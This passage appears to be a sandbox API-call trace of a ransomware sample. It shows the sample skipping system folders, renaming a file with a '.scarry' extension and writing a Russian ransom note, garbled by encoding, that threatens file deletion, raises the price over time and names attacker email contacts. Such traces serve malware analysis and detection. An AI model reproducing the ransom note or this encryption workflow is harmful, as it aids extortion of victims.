lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.403] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.403] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e97c, nSize=0x400 | out: lpBuffer="C:\\Windows") 
returned 0xa [0109.403] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a38, cbMultiByte=11, lpWideCharStr=0x18dd7c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.403] GlobalLock (hMem=0x450004) returned 0x591988 [0109.403] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.403] GlobalUnlock (hMem=0x450004) returned 0 [0109.403] GlobalLock (hMem=0x450004) returned 0x591988 [0109.403] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.403] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.403] GlobalUnlock (hMem=0x450004) returned 0 [0109.403] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.403] GlobalUnlock (hMem=0x45000c) returned 0 [0109.403] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.403] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=15, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 15 [0109.404] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=11, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 11 [0109.404] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.404] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.404] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9aaa8, cbMultiByte=18, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 18 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 28 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=10, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 10 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=8, lpWideCharStr=0x18dd84, cchWideChar=2047 | 
out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 8 [0109.405] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99f0, cbMultiByte=9, lpWideCharStr=0x18dd84, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\ition\\") returned 9 [0109.406] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", cchLength=0x37 | out: lpsz="c:\\program files\\common files\\microsoft shared\\grphflt\\") returned 0x37 [0109.406] SHGetMalloc (in: ppMalloc=0x18edcc | out: ppMalloc=0x18edcc*=0x767666bc) returned 0x0 [0109.406] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18edc8 | out: ppidl=0x18edc8) returned 0x0 [0109.406] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.407] SysReAllocStringLen (in: pbstr=0x18ee50*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18ee50*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.407] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.407] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.407] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.407] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.407] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.407] GlobalUnlock (hMem=0x45000c) returned 0 [0109.407] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.407] GlobalLock (hMem=0x450004) returned 0x593998 [0109.408] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.408] GlobalUnlock (hMem=0x45000c) 
returned 0 [0109.408] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.408] GlobalUnlock (hMem=0x450004) returned 0 [0109.408] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*", lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b020 [0109.433] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.433] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0109.433] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc8 | out: lpLocalFileTime=0x18edc8) returned 1 [0109.433] FileTimeToDosDateTime (in: lpFileTime=0x18edc8, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 
[0109.434] GlobalLock (hMem=0x450004) returned 0x591988 [0109.434] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.434] GlobalUnlock (hMem=0x450004) returned 0 [0109.434] GlobalLock (hMem=0x450004) returned 0x591988 [0109.434] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.434] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.434] GlobalUnlock (hMem=0x450004) returned 0 [0109.434] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.434] GlobalUnlock (hMem=0x45000c) returned 0 [0109.434] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.434] CharLowerBuffW (in: lpsz="CGMIMP32.CFG", cchLength=0xc | out: lpsz="cgmimp32.cfg") returned 0xc [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="f", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="2", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] 
WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3í\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ií\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="m", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18dd5c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cí\x18", lpUsedDefaultChar=0x0) returned 1 [0109.435] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18dd64, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.435] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", cchWideChar=67, lpMultiByteStr=0x18dd40, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpUsedDefaultChar=0x0) returned 67 [0109.435] CharLowerBuffW (in: lpsz=".CFG", cchLength=0x4 | out: lpsz=".cfg") returned 0x4 [0109.435] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".cfg", cchWideChar=4, lpMultiByteStr=0x18dd64, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cfgShared\\GRPHFLT\\CGMIMP32.CFG", lpUsedDefaultChar=0x0) returned 4 [0109.435] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\я"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0109.435] WriteFile (in: hFile=0x1a4, lpBuffer=0x1ea1d18*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x1ea1d18*, lpNumberOfBytesWritten=0x18ed70*=0x1, lpOverlapped=0x0) returned 1 [0109.436] CloseHandle (hObject=0x1a4) returned 1 [0109.437] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\я" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\я")) returned 1 [0109.438] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpFindFileData=0x18eb04 | out: lpFindFileData=0x18eb04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, 
nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 0x58b060 [0109.438] FileTimeToLocalFileTime (in: lpFileTime=0x18eb18, lpLocalFileTime=0x18ea30 | out: lpLocalFileTime=0x18ea30) returned 1 [0109.438] FileTimeToDosDateTime (in: lpFileTime=0x18ea30, lpFatDate=0x18eae6, lpFatTime=0x18eae4 | out: lpFatDate=0x18eae6, lpFatTime=0x18eae4) returned 1 [0109.438] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0109.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", dwFileAttributes=0x20) returned 1 [0109.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0109.438] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0109.438] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x1a9b [0109.438] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x18ea10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18ea10*=0) returned 0x0 [0109.438] ReadFile (in: hFile=0x1a4, lpBuffer=0x1e79f08, nNumberOfBytesToRead=0x1a9b, lpNumberOfBytesRead=0x18ea34, lpOverlapped=0x0 | out: lpBuffer=0x1e79f08*, lpNumberOfBytesRead=0x18ea34*=0x1a9b, lpOverlapped=0x0) returned 1 [0109.463] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.464] GlobalLock (hMem=0x450004) returned 0x593998 [0109.464] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.464] GlobalUnlock (hMem=0x45000c) returned 0 [0109.464] GlobalHandle (pMem=0x593998) 
returned 0x450004 [0109.464] GlobalUnlock (hMem=0x450004) returned 0 [0109.464] GlobalLock (hMem=0x450004) returned 0x591988 [0109.464] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.464] GlobalUnlock (hMem=0x450004) returned 0 [0110.410] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e7bb18, cbMultiByte=39, lpWideCharStr=0x18da40, cchWideChar=2047 | out: lpWideCharStr="M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry") returned 39 [0110.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\m5ypzectirtzy92aimbfka6hfij6lhuq.scarry")) returned 1 [0110.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\m5ypzectirtzy92aimbfka6hfij6lhuq.scarry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0110.411] SetFileTime (hFile=0x1a4, lpCreationTime=0x18ead0, lpLastAccessTime=0x18eac8, lpLastWriteTime=0x18eac0) returned 1 [0110.411] CloseHandle (hObject=0x1a4) returned 1 [0110.411] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\M5ypzeCTIrtZy92aImbFKa6HFij6LHUq.scarry", dwFileAttributes=0x20) returned 1 [0110.411] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ab98, cbMultiByte=36, lpWideCharStr=0x18dd68, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT\x18\x03") returned 36 [0110.412] GlobalLock (hMem=0x450004) returned 0x591988 [0110.412] GlobalHandle 
(pMem=0x591988) returned 0x450004 [0110.412] GlobalUnlock (hMem=0x450004) returned 0 [0110.412] GlobalLock (hMem=0x450004) returned 0x591988 [0110.412] GlobalLock (hMem=0x45000c) returned 0x593998 [0110.412] GlobalHandle (pMem=0x591988) returned 0x450004 [0110.412] GlobalUnlock (hMem=0x450004) returned 0 [0110.412] GlobalHandle (pMem=0x593998) returned 0x45000c [0110.412] GlobalUnlock (hMem=0x45000c) returned 0 [0110.412] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. 
\r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0110.412] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0110.412] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT", lpFindFileData=0x18eb1c | out: lpFindFileData=0x18eb1c*(dwFileAttributes=0x553a80, ftCreationTime.dwLowDateTime=0x22239048, ftCreationTime.dwHighDateTime=0x550000, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x553a80, nFileSizeHigh=0x2000002, nFileSizeLow=0x9569b257, dwReserved0=0xe80020c8, dwReserved1=0x402, cFileName="駐Ǫ\x18\x03", cAlternateFileName="")) returned 0xffffffff [0110.413] GetLastError () returned 0x2 [0110.413] CreateFileW (lpFileName="C:\\Program Files\\Common 
Files\\Microsoft Shared\\GRPHFLT\\Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.TXT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0110.413] WriteFile (in: hFile=0x1a4, lpBuffer=0x1e7ad38*, nNumberOfBytesToWrite=0xdf9, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x1e7ad38*, lpNumberOfBytesWritten=0x18ed24*=0xdf9, lpOverlapped=0x0) returned 1 [0110.414] CloseHandle (hObject=0x1a4) returned 1 [0110.415] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0110.415] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0110.415] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0110.415] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.415] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.415] GlobalUnlock (hMem=0x45000c) returned 0 [0110.415] GlobalLock (hMem=0x45000c) returned 0x591988 [0110.415] GlobalLock (hMem=0x450004) returned 0x593998 [0110.415] GlobalHandle (pMem=0x591988) returned 0x45000c [0110.415] GlobalUnlock (hMem=0x45000c) returned 0 [0110.415] GlobalHandle (pMem=0x593998) returned 0x450004 [0110.415] GlobalUnlock (hMem=0x450004) returned 0 [0110.415] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, 
